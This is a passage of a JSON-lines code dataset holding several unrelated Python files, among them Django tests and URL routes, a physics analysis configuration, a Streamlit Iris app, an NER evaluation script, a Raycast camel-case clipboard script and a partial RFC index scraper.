self.assertTrue(payload['points'] is None)\n\n\nclass CreditSubmissionResourceTestCase(ReadOnlyResourceTestCase):\n\n    # TODO - add test for UNRATED_CREDITSUBMISSION_ID?\n\n    __test__ = True  # Override ReadOnlyResourceTestCase.__test__ for nose.\n\n    RATED_CREDITSUBMISSION_ID = 3475\n    UNRATED_CREDITSUBMISSION_ID = None\n\n    # detail_path and list_path are defined for\n    # ReadOnlyResourceTestCase tests.\n\n    @property\n    def list_path(self):\n        return self._list_path(rated_submissionset=True)\n\n    @property\n    def detail_path(self):\n        return self._detail_path(rated_submissionset=True)\n\n    def _list_path(self, rated_submissionset):\n        \"\"\"List URI for the CreditSubmissions of a SubmissionSet.\n        The CreditSubmissions belong to a SubmissionSet that's rated\n        if rated_submissionset is True, otherwise they belong to an unrated\n        SubmissionSet.\n        \"\"\"\n        submissionset_id = (RATED_SUBMISSIONSET_ID if rated_submissionset\n                            else UNRATED_SUBMISSIONSET_ID)\n        return submissions_detail_path(submissionset_id) + 'credit/'\n\n    def _detail_path(self, rated_submissionset):\n        \"\"\"Detail URI for one CreditSubmission of a SubmissionSet.\n        The CreditSubmission belongs to a SubmissionSet that's rated\n        if rated_submissionset is True, otherwise it belongs to an unrated\n        SubmissionSet.\n        \"\"\"\n        creditsubmission_id = (\n            self.RATED_CREDITSUBMISSION_ID if rated_submissionset\n            else self.UNRATED_CREDITSUBMISSION_ID)\n        creditsubmission = CreditUserSubmission.objects.get(\n            pk=creditsubmission_id)\n        return (self._list_path(rated_submissionset) +\n                str(creditsubmission.credit.id) + '/')\n\n    def test_get_creditsubmission_list_requires_auth(self):\n        self.requires_auth(self._list_path(rated_submissionset=True))\n\n    def test_get_creditsubmission_list(self):\n        resp = self.get(self._list_path(rated_submissionset=True))\n        self.assertValidJSONResponse(resp)\n\n    def test_get_creditsubmission_detail_requires_auth(self):\n        self.requires_auth(self._detail_path(rated_submissionset=True))\n\n    def test_get_creditsubmission_detail(self):\n        path = self._detail_path(rated_submissionset=True)\n        resp = self.get(path)\n        self.assertValidJSONResponse(resp)\n\n\nclass DocumentationFieldSubmissionResourceTestCase(ReadOnlyResourceTestCase):\n\n    # TODO - add test for UNRATED_DOCUMENTATIONFIELDSUBMISSION_ID?\n\n    __test__ = True  # Override ReadOnlyResourceTestCase.__test__ for nose.\n\n    RATED_DOCUMENTATIONFIELDSUBMISSION_ID = 10345\n    UNRATED_DOCUMENTATIONFIELDSUBMISSION_ID = None\n\n    # For ReadOnlyResourceTestCase tests, list_path must be defined:\n    list_path = None\n\n    # For ReadOnlyResourceTestCase tests, detail_path must be available\n    # as an attribute of 
the class, not a method:\n @property\n def detail_path(self):\n return self._detail_path(rated_submissionset=True)\n\n def _detail_path(self, rated_submissionset):\n \"\"\"Detail URI for one DocumentationFieldSubmission of a\n SubmissionSet. The DocumentationFieldSubmission belongs to a\n SubmissionSet that's rated if rated_submissionset is True,\n otherwise it belongs to an unrated SubmissionSet.\n \"\"\"\n submissionset_id = (RATED_SUBMISSIONSET_ID if rated_submissionset\n else UNRATED_SUBMISSIONSET_ID)\n documenatationfieldsubmission_id = (\n self.RATED_DOCUMENTATIONFIELDSUBMISSION_ID if rated_submissionset\n else self.UNRATED_DOCUMENTATIONFIELDSUBMISSION_ID)\n documentationfieldsubmission = LongTextSubmission.objects.get(\n pk=documenatationfieldsubmission_id)\n return (submissions_detail_path(submissionset_id) + 'field/' +\n str(documentationfieldsubmission.documentation_field.id) + '/')\n\n def test_get_documentationfieldsubmission_detail_requires_auth(self):\n self.requires_auth(self.detail_path)\n\n def test_get_documentationfieldsubmission_detail(self):\n resp = self.get(self.detail_path)\n self.assertValidJSONResponse(resp)\n","sub_path":"stars/apps/submissions/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":14329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"313318702","text":"#!/usr/bin/env cmsRun\n\nimport FWCore.ParameterSet.Config as cms\nimport FWCore.Utilities.FileUtils as FileUtils\nfrom flashgg.Systematics.SystematicDumperDefaultVariables import minimalVariables,minimalHistograms\n\n# SYSTEMATICS SECTION\n\nprocess = cms.Process(\"FLASHggSyst\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.load(\"Configuration.StandardSequences.GeometryDB_cff\")\nprocess.load(\"Configuration.StandardSequences.MagneticField_cff\")\nprocess.load(\"Configuration.StandardSequences.FrontierConditions_GlobalTag_cff\")\nprocess.GlobalTag.globaltag = 'POSTLS170_V5::All'\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(100) )\nprocess.MessageLogger.cerr.FwkReport.reportEvery = cms.untracked.int32( 10 )\n\nprocess.RandomNumberGeneratorService = cms.Service(\"RandomNumberGeneratorService\",\n flashggDiPhotonSystematics = cms.PSet(initialSeed = cms.untracked.uint32(664)),\n flashggElectronSystematics = cms.PSet(initialSeed = cms.untracked.uint32(11)),\n flashggMuonSystematics = cms.PSet(initialSeed = cms.untracked.uint32(13))\n )\n\nprocess.load(\"flashgg.Systematics.flashggDiPhotonSystematics_cfi\")\nprocess.load(\"flashgg.Systematics.flashggMuonSystematics_cfi\")\nprocess.load(\"flashgg.Systematics.flashggElectronSystematics_cfi\")\nprocess.load(\"flashgg/Taggers/flashggTagSequence_cfi\")\nprocess.load(\"flashgg/Taggers/flashggTagTester_cfi\")\n\nfrom PhysicsTools.PatAlgos.tools.helpers import cloneProcessingSnippet,massSearchReplaceAnyInputTag\nmassSearchReplaceAnyInputTag(process.flashggTagSequence,cms.InputTag(\"flashggDiPhotons\"),cms.InputTag(\"flashggDiPhotonSystematics\"))\nmassSearchReplaceAnyInputTag(process.flashggTagSequence,cms.InputTag(\"flashggSelectedElectrons\"),cms.InputTag(\"flashggElectronSystematics\"))\nmassSearchReplaceAnyInputTag(process.flashggTagSequence,cms.InputTag(\"flashggSelectedMuons\"),cms.InputTag(\"flashggMuonSystematics\"))\n\nprocess.flashggSystTagMerger = cms.EDProducer(\"TagMerger\",src=cms.VInputTag(\"flashggTagSorter\"))\n\nprocess.systematicsTagSequences = cms.Sequence()\nsystlabels = [\"\"]\nfor r9 in 
[\"HighR9\",\"LowR9\"]:\n for direction in [\"Up\",\"Down\"]:\n systlabels.append(\"MCSmear%sEE%s01sigma\" % (r9,direction))\n for var in [\"Rho\",\"Phi\"]:\n systlabels.append(\"MCSmear%sEB%s%s01sigma\" % (r9,var,direction))\n for region in [\"EB\",\"EE\"]:\n systlabels.append(\"MCScale%s%s%s01sigma\" % (r9,region,direction))\n\nfor systlabel in systlabels:\n if systlabel == \"\":\n continue\n newseq = cloneProcessingSnippet(process,process.flashggTagSequence,systlabel)\n massSearchReplaceAnyInputTag(newseq,cms.InputTag(\"flashggDiPhotonSystematics\"),cms.InputTag(\"flashggDiPhotonSystematics\",systlabel))\n for name in newseq.moduleNames():\n module = getattr(process,name)\n if hasattr(module,\"SystLabel\"):\n module.SystLabel = systlabel\n process.systematicsTagSequences += newseq\n process.flashggSystTagMerger.src.append(cms.InputTag(\"flashggTagSorter\" + systlabel))\n\n###### Dumper section\n\nfrom FWCore.ParameterSet.VarParsing import VarParsing\nfrom flashgg.MetaData.samples_utils import SamplesManager\n\n## CMD LINE OPTIONS ##\n#options = VarParsing('analysis')\n#print options\n\n# maxEvents is the max number of events processed of each file, not globally\n#options.maxEvents = -1\n#options.inputFiles = \"file:myMicroAODOutputFile.root\"\n#options.outputFile = \"ValidationTagsDump.root\"\n#options.parseArguments()\n\nprocess.source = cms.Source (\"PoolSource\",\n fileNames = cms.untracked.vstring(\"file:myMicroAODOutputFile.root\"))\n\n#if options.maxEvents > 0:\n# process.source.eventsToProcess = cms.untracked.VEventRange('1:1-1:'+str(options.maxEvents))\n\nprocess.TFileService = cms.Service(\"TFileService\",\n fileName = cms.string(\"test.root\"))\n\nprocess.extraDumpers = cms.Sequence()\nprocess.load(\"flashgg.Taggers.diphotonTagDumper_cfi\") ## import diphotonTagDumper \nimport flashgg.Taggers.dumperConfigTools as cfgTools\n\nprocess.tagsDumper.className = \"DiPhotonTagDumper\"\nprocess.tagsDumper.src = \"flashggSystTagMerger\"\nprocess.tagsDumper.processId = \"test\"\nprocess.tagsDumper.dumpTrees = True\nprocess.tagsDumper.dumpWorkspace = True\nprocess.tagsDumper.dumpHistos = False\nprocess.tagsDumper.quietRooFit = True\nprocess.tagsDumper.nameTemplate = cms.untracked.string(\"$PROCESS_$SQRTS_$CLASSNAME_$SUBCAT_$LABEL\")\n\ntagList=[\n[\"UntaggedTag\",5],\n[\"VBFTag\",3],\n[\"VHTightTag\",0],\n[\"VHLooseTag\",0],\n[\"VHEtTag\",0],\n[\"VHHadronicTag\",0],\n[\"TTHHadronicTag\",0],\n[\"TTHLeptonicTag\",0]\n]\n\ndefinedSysts=set()\nprocess.tagsDumper.classifierCfg.remap=cms.untracked.VPSet()\nfor tag in tagList: \n tagName=tag[0]\n tagCats=tag[1]\n # remap return value of class-based classifier\n process.tagsDumper.classifierCfg.remap.append( cms.untracked.PSet( src=cms.untracked.string(\"flashgg%s\"%tagName), dst=cms.untracked.string(tagName) ) )\n for systlabel in systlabels:\n if not systlabel in definedSysts:\n # the cut corresponding to the systematics can be defined just once\n cutstring = \"hasSyst(\\\"%s\\\") \"%(systlabel)\n definedSysts.add(systlabel)\n else:\n cutstring = None\n cfgTools.addCategory(process.tagsDumper,\n systlabel,\n classname=tagName,\n cutbased=cutstring,\n subcats=tagCats, \n variables=minimalVariables,\n histograms=minimalHistograms\n )\n\nprocess.p = cms.Path((process.flashggDiPhotonSystematics+process.flashggMuonSystematics+process.flashggElectronSystematics)*\n (process.flashggTagSequence+process.systematicsTagSequences)*\n process.flashggSystTagMerger\n * process.tagsDumper)\n\n\n\n############################\n## Dump the output Python 
##\n############################\nprocessDumpFile = open('processDump.py', 'w')\nprint >> processDumpFile, process.dumpPython()\n\n\n\n# import flashgg customization\nfrom flashgg.MetaData.JobConfig import customize\n# set default options if needed\ncustomize.setDefault(\"maxEvents\",-1)\ncustomize.setDefault(\"targetLumi\",20e+3)\n# call the customization\ncustomize(process)\n","sub_path":"Systematics/test/MicroAODtoWorkspace.py","file_name":"MicroAODtoWorkspace.py","file_ext":"py","file_size_in_byte":6445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"339482215","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Aug 3 20:38:55 2020\r\n\r\n@author: Willi\r\n\"\"\"\r\n# Run from the command line: !streamlit run IRIS_APP.py\r\n\r\n\r\nimport streamlit as st\r\n\r\n# EDA \r\nimport pandas as pd \r\nimport matplotlib.pyplot as plt \r\nimport seaborn as sns \r\nfrom PIL import Image\r\n#-------------------------------------------------------------\r\n#Title\r\nst.title(\"IRIS EDA \")\r\nst.header(\"Streamlit App\")\r\n#-------------------------------------------------------------\r\n# Dataframe\r\n\r\npath = \"Iris.csv\"\r\n#-------------------------------------------------------------\r\n@st.cache\r\ndef load_data(path):\r\n    data = pd.read_csv(path)\r\n    return data \r\ndata = load_data(path)\r\n#-------------------------------------------------------------\r\n\r\nif st.sidebar.checkbox(\"Preview Dataset\"):\r\n    if st.button(\"Head\"):\r\n        st.write(data.head())\r\n    if st.button(\"Tail\"):\r\n        st.write(data.tail())\r\n\r\n#------------------------------------------------------------- \r\nif st.sidebar.checkbox(\"Show ALL dataset\"):\r\n    st.write(data)\r\n#------------------------------------------------------------- \r\n# Column Names\r\nif st.sidebar.checkbox(\"Show Column Names\"):\r\n    st.write(data.columns)\r\n#-------------------------------------------------------------\r\n#Summary\r\nif st.sidebar.checkbox(\"Show summary\"):\r\n    st.write(data.describe())\r\n    \r\n    \r\n#-------------------------------------------------------------\r\nd = [\"Rows\",\"Columns\",\"ALL\"]\r\ndata_dim = st.sidebar.radio(\"Select Dimensions to see:\",tuple(d))\r\n\r\nfor i in d:\r\n    if data_dim == i:\r\n        # st.text(f\"Showing {i}\")\r\n        \r\n        if i == \"ALL\":\r\n            st.header(f\"Shape {i} : {data.shape}\")\r\n        else:\r\n            st.header(f\"Shape {i} : {data.shape[d.index(i)]}\")\r\n        \r\n        \r\nif st.sidebar.checkbox(\"Show Correlations \"):\r\n    corr = data.corr()\r\n    cmap = plt.cm.RdBu\r\n    plt.title('Pearson Correlation', size=15)\r\n    st.write(sns.heatmap(corr, cmap=cmap, annot=True, linewidths=1))\r\n    st.pyplot()\r\n\r\n\r\n#-------------------------------------------------------------\r\nif st.sidebar.checkbox(\"Show columns\"):\r\n    # Select Column:\r\n    columnas = data.columns\r\n    col = st.sidebar.selectbox(\"Select Column\",tuple(columnas))\r\n    st.write(data[col])\r\n    \r\n    #-------------------------------------------------------------\r\n    if st.sidebar.checkbox(\"Show Histogram: \"):\r\n        st.write(data[col].plot(kind=\"hist\"))\r\n        st.pyplot()\r\n        \r\n#-------------------------------------------------------------\r\n@st.cache\r\ndef load_image(path):\r\n    imagen = Image.open(path)\r\n    return imagen\r\n    \r\n\r\ntipos = data[\"Species\"].unique()\r\nspecies_type = st.sidebar.radio(\"Select type: \", tuple(tipos))\r\nst.title(f\"Showing {species_type}\")\r\nst.image(load_image(f\"{species_type}.jpg\"))\n
\r\n\r\n#-------------------------------------------------------------\r\n \r\n\r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n\r\n\r\n","sub_path":"IRIS_APP.py","file_name":"IRIS_APP.py","file_ext":"py","file_size_in_byte":2930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"320653810","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Feb 21 21:13:09 2019\r\n\r\n@author: Αλέξανδρος\r\n\"\"\"\r\nents = []\r\ntexts = []\r\nett = [ \"Protein\", \"DNA\", \"RNA\", \"Cell Type\", \"Cell Line\" ]\r\n#PROTEIN, DNA, RNA, CELL_TYPE, CELL_LINE\r\ntp = [0, 0, 0, 0, 0] #true positives\r\nretrieved = [0, 0, 0, 0, 0]\r\nwith open(\"3. geniatagger tags\\\\osiris.txt\", encoding=\"utf-8\") as fi:\r\n \r\n line = fi.readline()\r\n \r\n while line:\r\n line = line.lower()# to make easier the comparison of strings\r\n line = line.split(\"\\t\")#to get entity type(ent) and entity(text)\r\n \r\n ent = line[1]\r\n #get retrieved for precision\r\n #not elif as there can be multiple types per entity\r\n if \"protein\" in ent:\r\n retrieved[0] += 1\r\n if \"dna\" in ent:\r\n retrieved[1] += 1\r\n if \"rna\" in ent:\r\n retrieved[2] += 1\r\n if \"cell_type\" in ent or \"celltype\" in ent or \"cell type\" in ent:\r\n retrieved[3] += 1\r\n if \"cell_line\" in ent or \"cellline\" in ent or \"cell line\" in ent:\r\n retrieved[4] += 1\r\n \r\n text = line[4]\r\n \r\n ents.append(ent)\r\n texts.append(text)\r\n \r\n line = fi.readline()\r\n \r\nrelevant = [0, 0, 0, 0, 0]\r\nwith open(\"1. annotations\\\\osiris.txt\", encoding=\"utf-8\") as fi:\r\n \r\n line = fi.readline()\r\n \r\n while line:\r\n \r\n line = line.lower()\r\n line = line.split(\"\\t\")\r\n \r\n ent = line[1]\r\n #get the relevants for recall\r\n #not elif as there can be multiple types per entity\r\n if \"protein\" in ent:\r\n relevant[0] += 1\r\n if \"dna\" in ent:\r\n relevant[1] += 1\r\n if \"rna\" in ent:\r\n relevant[2] += 1\r\n if \"cell_type\" in ent or \"celltype\" in ent or \"cell type\" in ent:\r\n relevant[3] += 1\r\n if \"cell_line\" in ent or \"cellline\" in ent or \"cell line\" in ent:\r\n relevant[4] += 1\r\n \r\n text = line[4]\r\n \r\n #check if the current line is found by the NER program\r\n if text in texts:\r\n index = texts.index(text)\r\n tmp = ents[ index ]\r\n \r\n del texts[index] #remove the text\r\n del ents[index]\r\n \r\n #not elif as there can be multiple types per entity\r\n if \"protein\" in ent and \"protein\" in tmp:\r\n tp[0] += 1\r\n if \"dna\" in ent and \"dna\" in tmp:\r\n tp[1] += 1\r\n if \"rna\" in ent and \"rna\" in tmp:\r\n tp[2] += 1\r\n if (\"cell_type\" in ent or \"celltype\" in ent or \"cell type\" in ent) and (\"cell_type\" in tmp or \"celltype\" in tmp or \"cell type\" in tmp):\r\n tp[3] += 1\r\n if (\"cell_line\" in ent or \"cellline\" in ent or \"cell line\" in ent) and (\"cell_line\" in tmp or \"cellline\" in tmp or \"cell line\" in tmp):\r\n tp[4] += 1\r\n \r\n line = fi.readline()\r\n\r\n#for micro and macro average\r\nrelevant_sum = sum(relevant)#sum of all relevant\r\nretrieved_sum = sum(retrieved)#sum of all retrieved\r\ntp_sum = 0 # sum of all tp\r\nprec = 0 #sum of all precisions\r\nrec = 0 #sum of all recalls\r\n#for weighted average\r\nweighted_p = 0 \r\nweighted_r = 0\r\ntotal = len(ett)\r\n#print results\r\nfor i in range(0, len(ett)):\r\n \r\n if retrieved[i] == 0 or relevant[i] == 0 or tp[i] == 0:\r\n precision = 0\r\n recall = 0\r\n f1 = 0\r\n else:\r\n precision = tp[i]/retrieved[i]\r\n recall = 
tp[i]/relevant[i]\r\n f1 = (2 * precision * recall) / (precision + recall)\r\n \r\n #for micro and macro average\r\n tp_sum += tp[i]\r\n prec += precision\r\n rec += recall\r\n #for weighted average\r\n if retrieved_sum != 0:\r\n weighted_p += ( precision * ( retrieved[i] / retrieved_sum ) )\r\n else:\r\n weighted_p += 0\r\n \r\n if relevant_sum != 0:\r\n weighted_r += ( recall * ( relevant[i] / relevant_sum ) )\r\n else:\r\n weighted_r += 0\r\n \r\n print(\"{}: \".format(ett[i]))\r\n print(\"\\tPrecision: {}\".format(precision))\r\n print(\"\\tRecall: {}\".format(recall))\r\n print(\"\\tF1: {}\".format(f1))\r\n #for micro and macro average\r\n print(\"\\tTrue Positives: {}\".format(tp[i]))\r\n print(\"\\tFalse Positives: {}\".format( abs(tp[i] - retrieved[i]) ))\r\n print(\"\\tFalse Negatives: {}\".format( abs(tp[i] - relevant[i]) )) \r\n\r\n#micro average\r\nif retrieved_sum != 0:\r\n mi_pre = tp_sum/retrieved_sum\r\nelse:\r\n mi_pre = 0\r\n \r\nif relevant_sum != 0:\r\n mi_rec = tp_sum/relevant_sum\r\nelse:\r\n mi_rec = 0\r\n\r\nif (mi_pre + mi_rec) != 0:\r\n mi_f1 = (2 * mi_pre * mi_rec) / (mi_pre + mi_rec)\r\nelse:\r\n mi_f1 = 0\r\nprint(\"Micro Average: \")\r\nprint(\"\\tPrecision: {}\".format(mi_pre))\r\nprint(\"\\tRecall: {}\".format(mi_rec))\r\nprint(\"\\tF1: {}\".format(mi_f1))\r\n \r\n#macro average\r\nma_pre = prec/total\r\nma_rec = rec/total\r\n\r\nif (ma_pre + ma_rec) != 0:\r\n ma_f1 = (2 * ma_pre * ma_rec) / (ma_pre + ma_rec)\r\nelse:\r\n ma_f1 = 0\r\n\r\nprint(\"Macro Average: \")\r\nprint(\"\\tPrecision: {}\".format(ma_pre))\r\nprint(\"\\tRecall: {}\".format(ma_rec))\r\nprint(\"\\tF1: {}\".format(ma_f1))\r\n\r\n#weighted average\r\nwe_pre = weighted_p\r\nwe_rec = weighted_r\r\n\r\nif (we_pre + we_rec) != 0:\r\n we_f1 = (2 * we_pre * we_rec) / (we_pre + we_rec)\r\nelse:\r\n we_f1 = 0\r\n\r\nprint(\"Weighted Average: \")\r\nprint(\"\\tPrecision: {}\".format(we_pre))\r\nprint(\"\\tRecall: {}\".format(we_rec))\r\nprint(\"\\tF1: {}\".format(we_f1))\r\n","sub_path":"code/tools/abner/pr_abner.py","file_name":"pr_abner.py","file_ext":"py","file_size_in_byte":5445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"459272770","text":"from django.urls import path,re_path\r\nfrom django.views.generic import DetailView, ListView, UpdateView\r\nfrom .form import RestaurantForm,DishForm\r\nfrom .models import Restaurant,Dish\r\nfrom .views import RestaurantDetail,RestaurantCreate,DishCreate,DishDetail\r\nfrom . 
import views\r\nfrom django.utils import timezone\r\n\r\nurlpatterns = [\r\n path('signup/', views.SignUp.as_view(), name='signup'),\r\n\r\n re_path(r'^myrestaurants',ListView.as_view(\r\n \tqueryset=Restaurant.objects.filter(date__lte=timezone.now()).order_by('date')[:10],\r\n context_object_name='latest_restaurant_list',\r\n template_name='restaurant_list.html'),\r\n name='restaurant_list'),\r\n\r\n\r\n re_path(r'^mydishes',ListView.as_view(\r\n \tqueryset=Dish.objects.filter(date__lte=timezone.now()).order_by('date')[:10],\r\n context_object_name='latest_dishes_list',\r\n template_name='dish_list.html'),\r\n name='dish_list'),\r\n\r\n\r\n re_path(r'^restaurants/(?P\\d+)/\\$',\r\n RestaurantDetail.as_view(),\r\n name='restaurant_detail'),\r\n\r\n\r\n re_path(r'^mydishes/(?P\\d+)/\\$',\r\n DishDetail.as_view(),\r\n name='dish_detail'), \r\n\r\n re_path(r'\\^restaurants/create/\\$',\r\n RestaurantCreate.as_view(),\r\n name='restaurant_create'),\r\n\r\n\r\n re_path(r'\\^mydishes/create/\\$',\r\n \tDishCreate.as_view(),\r\n name='dish_create'),\r\n\r\n\r\n re_path(r'^Customerpage/',views.CustomerPage,name='customerpage'),\r\n\r\n\r\n re_path(r'^Customersupport/',views.CustomerSupport,name='customersupport'),\r\n\r\n re_path(r'^deals/',views.Deals,name='deals'),\r\n\r\n re_path(r'^menu/',views.Menu,name='menu'),\r\n\t \r\n\t re_path(r'^chat/', views.Chat, name='chat'),\r\n\r\n\r\n\r\n\r\n]","sub_path":"classproject/project/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"233452191","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Required parameters:\n# @raycast.schemaVersion 1\n# @raycast.title Camel Case\n# @raycast.mode inline\n# @raycast.packageName Change Case\n\n# Optional parameters:\n# @raycast.icon ./images/camelcase-light.png\n# @raycast.iconDark ./images/camelcase-dark.png\n\n# Documentation:\n# @raycast.author Robert Cooper\n# @raycast.authorURL https://github.com/robertcoopercode\n# @raycast.description Change to clipboard text to camel case\n\nimport subprocess\nimport re\n\nalways_uppercase = r\"\"\"\\bXML|HTML|CSS|JSON|FYI|AOL|ATM|BBC|CD|FAQ|GAIM|GNU|GTK|HIRD|HIV\n |HURD|IEEE|IOU|IRA|IUPAC|JPEG|LCD|NAACP|NAC|NATO|NCAA|NOAD|OEM|PHP|ROM|SAT|SFMOMA|SQL|USA|VHDL|VHSIC|W3C\n |LOL|WTF\\b\"\"\"\nalways_uppercase_re = re.compile(always_uppercase, re.I | re.X)\n\n\ndef __dict_replace(s, d):\n \"\"\"Replace substrings of a string using a dictionary.\"\"\"\n for key, value in d.items():\n s = s.replace(key, value)\n return s\n\n\nSMALL = \"a|an|and|as|at|but|by|en|for|if|in|of|on|or|the|to|v\\.?|via|vs\\.?\"\nPUNCT = r\"\"\"!\"#$%&'‘()*+,\\-./:;?@[\\\\\\]_`{|}~\"\"\"\n\nSMALL_WORDS = re.compile(r\"^(%s)$\" % SMALL, re.I)\nINLINE_PERIOD = re.compile(r\"[a-z][.][a-z]\", re.I)\nUC_ELSEWHERE = re.compile(r\"[%s]*?[a-zA-Z]+[A-Z]+?\" % PUNCT)\nCAPFIRST = re.compile(r\"^[%s]*?([A-Za-z])\" % PUNCT)\nSMALL_FIRST = re.compile(r\"^([%s]*)(%s)\\b\" % (PUNCT, SMALL), re.I)\nSMALL_LAST = re.compile(r\"\\b(%s)[%s]?$\" % (SMALL, PUNCT), re.I)\nSUBPHRASE = re.compile(r\"([:.;?!][ ])(%s)\" % SMALL)\nAPOS_SECOND = re.compile(r\"^[dol]{1}['‘]{1}[a-z]+$\", re.I)\nALL_CAPS = re.compile(r\"^[A-Z\\s%s]+$\" % PUNCT)\nUC_INITIALS = re.compile(r\"^(?:[A-Z]{1}\\.{1}|[A-Z]{1}\\.{1}[A-Z]{1})+$\")\nMAC_MC = re.compile(r\"^([Mm]a?c)(\\w+)\")\n\n\ndef titlecase(text):\n\n \"\"\"\n Titlecases input text\n\n This filter changes all words to Title Caps, and attempts to be clever\n about 
*un*capitalizing SMALL words like a/an/the in the input.\n\n The list of \"SMALL words\" which are not capped comes from\n the New York Times Manual of Style, plus 'vs' and 'v'.\n\n \"\"\"\n\n lines = re.split(\"[\\r\\n]+\", text)\n processed = []\n for line in lines:\n all_caps = ALL_CAPS.match(line)\n words = re.split(\"[\\t ]\", line)\n tc_line = []\n for word in words:\n if all_caps:\n if UC_INITIALS.match(word):\n tc_line.append(word)\n continue\n else:\n word = word.lower()\n\n if APOS_SECOND.match(word):\n word = word.replace(word[0], word[0].upper())\n word = word.replace(word[2], word[2].upper())\n tc_line.append(word)\n continue\n if INLINE_PERIOD.search(word) or UC_ELSEWHERE.match(word):\n tc_line.append(word)\n continue\n if SMALL_WORDS.match(word):\n tc_line.append(word.lower())\n continue\n\n match = MAC_MC.match(word)\n if match:\n tc_line.append(\n \"%s%s\" % (match.group(1).capitalize(), match.group(2).capitalize())\n )\n continue\n\n hyphenated = []\n for item in word.split(\"-\"):\n hyphenated.append(CAPFIRST.sub(lambda m: m.group(0).upper(), item))\n tc_line.append(\"-\".join(hyphenated))\n\n result = \" \".join(tc_line)\n\n result = SMALL_FIRST.sub(\n lambda m: \"%s%s\" % (m.group(1), m.group(2).capitalize()), result\n )\n\n result = SMALL_LAST.sub(lambda m: m.group(0).capitalize(), result)\n\n result = SUBPHRASE.sub(\n lambda m: \"%s%s\" % (m.group(1), m.group(2).capitalize()), result\n )\n\n processed.append(result)\n\n return \"\\n\".join(processed)\n\n\ndef titlecase_plus(text):\n \"\"\"The titlecase module assumes words in all UPPERCASE should be ignored.\n This works for words like HTML, FYI, ID, etc., but not generally. Just work\n around for now by going to .lower first. Then, replace any well known\n \"always\" uppercase\"\"\"\n text = titlecase(text.lower())\n\n def upcase(m):\n return m.group().upper()\n\n return always_uppercase_re.sub(upcase, text)\n\ndef getClipboardData():\n p = subprocess.Popen([\"pbpaste\"], stdout=subprocess.PIPE)\n data = p.stdout.read()\n return tryDecode(data)\n\ndef setClipboardData(data):\n p = subprocess.Popen([\"pbcopy\"], stdin=subprocess.PIPE)\n p.stdin.write(tryEncode(data))\n p.stdin.close()\n\ndef tryDecode(s):\n try:\n return s.decode('utf-8')\n except:\n return s\n\ndef tryEncode(s):\n try:\n return s.encode('utf-8')\n except:\n return s\n\nclipboard = str(getClipboardData())\nresult = titlecase_plus(clipboard).replace(\" \", \"\")\nresult = result[0].lower() + result[1:]\nsetClipboardData(result)\nprint(result)\n","sub_path":"commands/conversions/change-case/camelcase.py","file_name":"camelcase.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"13040538","text":"import os\nimport re\nimport argparse\n\nimport wget\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport pandas as pd\nimport numpy as np\nfrom tqdm import tqdm\n\n\ndef parse_arguments():\n \"\"\"\n url, errors_filepath, outdir\n \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--index_url\",\n type=str,\n default='https://tools.ietf.org/rfc/index',\n help=\"URL of the online RFC index.\",\n )\n parser.add_argument(\"--rfc_base_url\",\n type=str,\n default='https://tools.ietf.org/rfc/', \n help=\"Base URL for downloading a RFC in text form.\",\n )\n parser.add_argument(\"--outdir\",\n type=str,\n required=True,\n help=\"Output directory.\",\n )\n arguments, _ = parser.parse_known_args()\n return arguments\n\n\n\ndef 
concat_rfc_lines(lines):\n \"\"\"\n Given a list of lines where a same RFC is described on multiple lines, concat\n the lines describing the same RFC.\n \"\"\"\n rfc_lines = []\n current_rfc = ''\n for line in lines:\n if line.startswith('RFC'):\n rfc_lines.append(current_rfc) # End of previous RFC, append it to list.\n current_rfc = line # Get beginning of new rfc.\n else:\n current_rfc += line\n return rfc_lines\n\n\ndef remove_multiple_spaces(text):\n \"\"\"\n Given a string, replace all multiple spaces in it by a single space.\n \"\"\"\n text = re.sub('\\s{2,}', ' ', text)\n text = text.lstrip().rstrip() # Remove whitespaces in beginning or end of string.\n return text\n \n\ndef get_rfc_lines(page):\n \"\"\"\n Given the result of an url request, get the text of interest.\n \"\"\"\n # Load the page with BeautifulSoup.\n soup = BeautifulSoup(page.content, 'html.parser')\n \n # Get the text of interest (the index is in
    <pre> ... </pre>
    ).\n body = soup('pre')[0]\n \n # Get plain text.\n content = body.get_text() \n \n # Remove all text before the line beginning by 'RFC1' (beginning of the index).\n content = content.split('RFC1 ')[1]\n content = 'RFC1 ' + content\n \n # Split raw text to lines.\n lines = content.splitlines()\n lines = [line for line in lines if line != ''] # remove empty lines.\n \n # Concat lines describing the same RFC.\n rfc_lines = concat_rfc_lines(lines)\n rfc_lines = rfc_lines[1:]\n \n # Remove multiple spaces in lines.\n rfc_lines = [remove_multiple_spaces(line) for line in rfc_lines]\n \n # Remove all 'Non Issued' RFC lines.\n rfc_lines = [line for line in rfc_lines if 'Not Issued' not in line]\n \n return rfc_lines\n\n\ndef create_dataframe(rfc_lines):\n \"\"\"\n Given the lines describing each RFC, create a dataframe.\n \"\"\"\n # Init lists.\n names = []\n titles = []\n authors = []\n dates = []\n formats = []\n obsolotes = []\n obsoloted = []\n updates = []\n updated = []\n also = []\n status = []\n dois = []\n \n # Process each line.\n for i, line in enumerate(tqdm(rfc_lines)):\n \n # Get all attributes within brackets.\n brackets = re.findall(r\"\\((.*?)\\)\", line)\n\n # Get individual attributes.\n form = None\n obs = None\n 